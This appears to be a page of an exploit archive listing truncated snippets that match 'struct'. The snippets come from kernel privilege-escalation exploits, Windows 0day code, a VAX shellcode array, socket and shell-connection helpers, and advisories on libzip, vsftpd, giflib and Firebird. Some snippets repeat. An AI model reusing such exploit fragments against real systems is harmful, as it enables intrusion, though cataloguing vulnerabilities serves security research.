Next Page >>
struct
/* Globals */
int sockfd;
int nhrp_req_id;
/* GRE header */
struct gre_h {
unsigned short flags; /* GRE flags */
unsigned short ptype; /* GRE protocol type */
unsigned int key; /* GRE key */
};
PVOID ProcessInformation,
ULONG ProcessInformationLength,
PULONG ReturnLength
);
typedef struct _STRING {
USHORT Length;
USHORT MaximumLength;
PCHAR Buffer;
} STRING;
typedef STRING *PSTRING;
PVOID ProcessInformation,
ULONG ProcessInformationLength,
PULONG ReturnLength
);
typedef struct _STRING {
USHORT Length;
USHORT MaximumLength;
PCHAR Buffer;
} STRING;
typedef STRING *PSTRING;
nmount(2) system calls. In order for them to be enabled for unprivileged
users the sysctl(8) variable vfs.usermount must be set to a non-zero
value.
The function nfs_mount() employs an insufficient input validation method
for copying data passed in a structure of type nfs_args from userspace to
kernel. Specifically, the file handle buffer to be mounted (args.fh) and
its size (args.fhsize) are completely user-controllable. The unbounded copy
operation is in file src/sys/nfsclient/nfs_vfsops.c (the excerpts are from
8.0-RELEASE):
* service? What are you, some kind of script kiddie? No, the answer is
* obvious. You must read the uninitialized bytes of the kernel stack, since
* these bytes contain all the secrets of the universe and the meaning of life.
*
* How can you accomplish this insidious feat? You immediately discard the
* notion of looking for uninitialized struct members that are copied back to
* userspace, since you clearly need something far more elite. In order to
* prove your superiority, your exploit must be as sophisticated as your taste
* in obscure electronic music. After scanning the kernel source for good
* candidates, you find your target and begin to code...
*
> * these bytes contain all the secrets of the universe and the meaning of
>life.
> *
> * How can you accomplish this insidious feat? You immediately discard
>the
> * notion of looking for uninitialized struct members that are copied
>back to
> * userspace, since you clearly need something far more elite. In order
>to
> * prove your superiority, your exploit must be as sophisticated as your
>taste
(although there is no requirement to do so).
An ipcomp datagram consists of an ip header with ip->ip_p set to 108, followed
by a 32 bit ipcomp header, described in C syntax below.
struct ipcomp {
uint8_t comp_nxt; // Next Header
uint8_t comp_flags; // Reserved
uint16_t comp_cpi; // Compression Parameter Index
};
>> * these bytes contain all the secrets of the universe and the meaning of
>> life.
>> *
>> * How can you accomplish this insidious feat? You immediately discard
>> the
>> * notion of looking for uninitialized struct members that are copied
>> back to
>> * userspace, since you clearly need something far more elite. In order
>> to
>> * prove your superiority, your exploit must be as sophisticated as your
>> taste
>>> * these bytes contain all the secrets of the universe and the meaning of
>>> life.
>>> *
>>> * How can you accomplish this insidious feat? You immediately discard
>>> the
>>> * notion of looking for uninitialized struct members that are copied
>>> back to
>>> * userspace, since you clearly need something far more elite. In order
>>> to
>>> * prove your superiority, your exploit must be as sophisticated as your
>>> taste
#include <stdlib.h>
#define VTP_DOMAIN_SIZE 32
#define VTP_TIMESTAMP_SIZE 12
struct vtp_summary {
u_int8_t version;
u_int8_t code;
u_int8_t followers;
u_int8_t dom_len;
u_int8_t domain[VTP_DOMAIN_SIZE];
#endif
}
unsigned long resolv(const char *host)
{
struct hostent *hp;
unsigned long host_ip;
host_ip = inet_addr(host);
if( host_ip == INADDR_NONE )
{
#endif
}
unsigned long resolv(const char *host)
{
struct hostent *hp;
unsigned long host_ip;
host_ip = inet_addr(host);
if( host_ip == INADDR_NONE )
{
#include <stdlib.h>
#define VTP_DOMAIN_SIZE 32
#define VTP_TIMESTAMP_SIZE 12
struct vtp_summary {
u_int8_t version;
u_int8_t code;
u_int8_t followers;
u_int8_t dom_len;
u_int8_t domain[VTP_DOMAIN_SIZE];
Due to uninitalised value in devfs_open(), following function is called with
fp->f_vnode = 0:
static int
devfs_fp_check(struct file *fp, struct cdev **devp, struct cdevsw **dswp)
{
*dswp = devvn_refthread(fp->f_vnode, devp);
if (*devp != fp->f_data) {
if (*dswp != NULL)
* trivially allows you to get root. However, I found another way to get root
* from CAP_SYS_ADMIN...the hard way.
*
* This exploit leverages a signedness error in the Phonet protocol. By
* specifying a negative protocol index, I can craft a series of fake
* structures in userspace and cause the incrementing of an arbitrary kernel
* address, which I then leverage to execute arbitrary kernel code.
*
* Greets to spender, cloud, jono, kees, pipacs, redpig, taviso, twiz, stealth,
* and bla.
*
static int own_child(int *us)
{
int pid;
int s[2];
struct msghdr mh;
char crap[1024];
struct iovec iov;
struct cmsghdr *c;
int *fd;
int rc;
#include <netdb.h>
int socket_connect(char *server, int port) {
int fd;
struct sockaddr_in sock;
struct hostent *host;
memset(&sock, 0, sizeof(sock));
if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1;
Original URL:
http://securityreason.com/achievement_securityalert/99
--- 0.Description ---
The getservbyname(), and getservbyport() functions each return a pointer to an object with the following structure containing the broken-out fields of a line in the network services data base,
struct servent *
getservbyname(const char *name, const char *proto);
struct servent *
- --- 0.Description ---
The fts functions are provided for traversing UNIX file hierarchies.
The fts_open() function returns a "handle" on a file hierarchy, which is then supplied to the other fts functions.
The function fts_read() returns a pointer to a structure describing one of the files in the file hierarchy.
The function fts_children() returns a pointer to a linked list of structures, each of which describes one of the files contained in a directory within the hierarchy.
typedef struct _ftsent {
unsigned short fts_info; /* flags for FTSENT structure */
char *fts_accpath; /* access path */
{
static char prevuser[MAX_LOGIN + 1], prevpass[61];
char *p, *q, *end;
int n;
char *user, *pass, *gecos, *home, *shell;
struct passwd *pw;
int found = 0;
p = buf;
end = buf + count;
while (p < end && (p = memchr(p, '/', end - p))) {
"\r\nPASS:\r\n";
static int
shell_sock (char *host, int port)
{
struct sockaddr_in addr;
int sockfd;
sockfd = socket(PF_INET, SOCK_STREAM, 0);
if (sockfd == -1) {
perror ("socket");
First, the Logical Screen Size is read and stored in the following
calling sequence (As giflib is an Open Source MIT-licenced library, the
source was available for analysis):
'GIFImageDecoder::onDecode()->DGifOpen()->DGifGetScreenDesc()'. The last
function, 'DGifGetScreenDesc()', stores the _Logical Screen Width and
Height_ in a structure called 'GifFileType':
/-----------
Int DGifGetScreenDesc(GifFileType * GifFile) {
...
#include <stdio.h>
#include <unistd.h>
#include <string.h>
int port=21;
struct hostent *he;
struct sockaddr_in their_addr;
int konekt(char *addr)
#include <netdb.h>
int socket_connect(char *server, int port) {
int fd;
struct sockaddr_in sock;
struct hostent *host;
memset(&sock, 0, sizeof(sock));
if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1;
__asm{mov edi ,edi
nop };
}
enum { SystemModuleInformation = 11,
SystemHandleInformation = 16 };
typedef struct {
ULONG Unknown1;
ULONG Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
// Rising0day.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include "windows.h"
enum { SystemModuleInformation = 11 };
typedef struct {
ULONG Unknown1;
ULONG Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
005ACE46 |. E8 65D7FFFF CALL <fbserver.rem_port::disconnect>
; \port->disconnect(sendL, receive)
- -----------/
The type of 'port' is 'struct rem_port', as defined in
'src/remote/remote.h'. This struct type has a 'disconnect()' function
that is implemented in 'src/remote/server.cpp':
/-----------
so any next {{*},Recursion} will increment the complexity. Let's see what is wrong and where. In vsftpd the main problem exists in ls.c.
- -ls.c--
int
vsf_filename_passes_filter(const struct mystr* p_filename_str,
const struct mystr* p_filter_str)
{
...
else if (last_token == '{')
{
See the VAX Architecture Reference Manual (VARM) or the
VAX Arcitecture Handbook.
http://www.bitsavers.org/pdf/dec/vax/archSpec has a copy
of the internal version of the VARM,
which will help explain the stack frame and the instruction set.
*/
unsigned char shellcode[] =
"\021\017" /* brb shellcode+0x11 (PC-relative) */
"\272\001" /* popr $0x1 (this is a mask: pop one word into r0) */
--- 1.Description ---
libzip allows remote and local attackers to Denial of Service (Null Pointer Dereference) if ZIP_FL_UNCHANGED flag is set.
-lib/zip_name_locate.c---
int
_zip_name_locate(struct zip *za, const char *fname, int flags,
struct zip_error *error)
{
int (*cmp)(const char *, const char *);
const char *fn, *p;
int i, n;
Next Page>>
|
